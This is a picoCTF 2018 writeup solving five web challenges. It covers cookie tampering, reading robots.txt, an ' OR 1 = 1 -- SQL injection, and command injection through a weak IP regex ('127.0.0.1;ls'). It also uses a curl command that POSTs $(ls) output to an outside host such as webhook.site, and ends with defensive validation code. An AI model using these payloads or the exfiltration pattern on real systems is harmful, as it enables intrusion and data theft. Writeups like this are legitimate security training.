picoCTF 2018 Web Exploitation writeup
===

###### tags: `picoCTF 2018` `Web Exploitation`

# Logon - Points: 150

Hints:

* Hmm it doesn't seem to check anyone's password, except for admins?
* How does it check the admin's password?

## Approach:

I spent a long time on this one. At first I tried blasting it with SQL injection, but that failed QQ. Then it hit me that the site probably authenticates via a cookie, and a cookie is trivial to modify.

Using [EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg):

1. Log in with arbitrary credentials first
   ![](https://i.imgur.com/JSNDRSb.jpg)
2. The page after logging in
   ![](https://i.imgur.com/PP2ZTEL.jpg)
3. Take a look at the cookies
   ![](https://i.imgur.com/rwlr39i.jpg)
4. The `admin` value looks suspicious; try changing it to `True` (the T must be uppercase!!)
   ![](https://i.imgur.com/N5bhQjI.jpg)
5. Refresh the page and the flag is captured
   ![](https://i.imgur.com/u4P8ZsN.jpg)

# Mr. Robots - Points: 200

## Approach:

Hint: What part of the website could tell you where the creator doesn't want you to look?

1. That points to robots.txt
2. Open [http://2018shell3.picoctf.com:29568/robots.txt](http://2018shell3.picoctf.com:29568/robots.txt)
3. It contains:
   ```
   User-agent: *
   Disallow: /74efc.html
   ```
4. Open [http://2018shell3.picoctf.com:29568/74efc.html](http://2018shell3.picoctf.com:29568/74efc.html)
5. Flag captured

# Buttons - Points: 250 :poop:

## Approach

1. The only difference between the two buttons is POST versus GET
2. Request `http://2018shell3.picoctf.com:21579/button2.php` with POST instead
3. Flag captured

# The Vault - Points: 250

## Approach

1. In the [source code](http://2018shell3.picoctf.com:49030/login.txt):
   ```php=20
   //validation check
   $pattern = "/.*['\"].*OR.*/i";
   $user_match = preg_match($pattern, $username);
   $password_match = preg_match($pattern, $username);
   ```
   `$password` is never filtered (the second `preg_match` runs against `$username` again), so SQL injection is possible through `$password`.
2. SQL injection:
   ```
   Username: 1234
   Password: ' OR 1 = 1 --
   ```
3. Flag captured.

# fancy-alive-monitoring - Points: 400

## Approach

1. Hint:
   > This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.

   So the front end validates the IP format, but the back-end validation is sloppy.
2. Looking at the source code, the check is a regular expression (regex), and it looks like the regex is badly written.
3. Drop the regex into https://www.freeformatter.com/regex-tester.html to check it:
   ```regex
   ^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])
   ```
   ![](https://i.imgur.com/x3DYA1G.jpg)
   It turns out that whatever comes at the end doesn't seem to matter? Let's try 127.0.0.ls
   ![](https://i.imgur.com/djuJ1GC.jpg)
   Nice
4. The source code contains
   ```php
   exec('ping -c 1 '.$ip, $cmd_result);
   ```
   This looks injectable. Googling "php exec injection" led me to https://hk.saowen.com/a/ac2a030e04a2c32145fcd4b2bea61d7a28963fc8a4d200b8a21c787be57d5e71, which points out that `;` separates commands on Linux.
5. That covers the core idea; now for the actual steps.
   Front end: in the Console, override the original `check` function:
   ```
   function check(){document.getElementById("monitor").submit();}
   ```
   Back end: Input: 127.0.0.1;ls
   ![](https://i.imgur.com/XM6iR5C.jpg)
   It works. The bad news is that, judging from the source code, the output of `ls` is never shown to me, so I need a way to get the `ls` output out.
6. I used curl to send the data out, following https://unix.stackexchange.com/questions/326863/how-to-post-shell-output-as-json-data-with-curl
   ```bash
   curl -H "Content-Type: application/json" -X POST -d "{\"ls\": \"$(ls)\"}" "http://sitename.com/update.php"
   ```
   But I still needed a server to receive the POST, and I was too lazy to write a back end for that. Googling "receive http request" led me to https://webhook.site
   So I submitted the input twice: the first time to see what `ls` lists (there is a flag.txt), and the second time to `cat flag.txt`.
   The result looks roughly like this: https://webhook.site/#/391626f7-96de-47f5-a8f4-d1c26452d5be/4b53cb28-c885-4e37-9cd4-65fc92671abb/1
7. Flag captured
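The weak regex from step 3 and the `exec` call from step 4, side by side with validation that would have held, as an added Python example (not code from the original writeup or from the challenge): it reproduces the challenge's pattern with Python's `re`, which backtracks over it the same way PCRE does for these inputs, and the names `weak_check`, `strict_check`, `parser_check` and `safe_ping_argv` are my own.

```python
import ipaddress
import re

# The challenge's server-side pattern, verbatim. Two defects: the "." between
# octets is unescaped (so it matches any character), and there is no "$" anchor
# (so any trailing text after a valid-looking prefix is accepted).
WEAK_IP_RE = re.compile(
    r"^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}"
    r"([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
)

# The same pattern with both defects fixed: literal dots and an end anchor.
STRICT_IP_RE = re.compile(
    r"^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}"
    r"([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
)


def weak_check(ip: str) -> bool:
    """Mirror of the challenge's check (preg_match on the weak pattern)."""
    return WEAK_IP_RE.match(ip) is not None


def strict_check(ip: str) -> bool:
    """Regex check with the dot escaped and the end anchored."""
    return STRICT_IP_RE.match(ip) is not None


def parser_check(ip: str) -> bool:
    """Preferred: let an address parser decide instead of a hand-written regex
    (the PHP equivalent is filter_var($ip, FILTER_VALIDATE_IP))."""
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True


def safe_ping_argv(ip: str) -> list:
    """Build the ping command as an argv list (no shell involved) and only
    after the input has been validated; together these stop an input such as
    '127.0.0.1;ls' from ever reaching a command interpreter."""
    if not parser_check(ip):
        raise ValueError("not an IPv4 address: %r" % ip)
    return ["ping", "-c", "1", ip]


if __name__ == "__main__":
    # Constructed sample inputs: the two from the writeup plus one out-of-range octet.
    for sample in ["127.0.0.1", "127.0.0.ls", "127.0.0.1;ls", "256.1.1.1"]:
        print(sample, weak_check(sample), strict_check(sample), parser_check(sample))
```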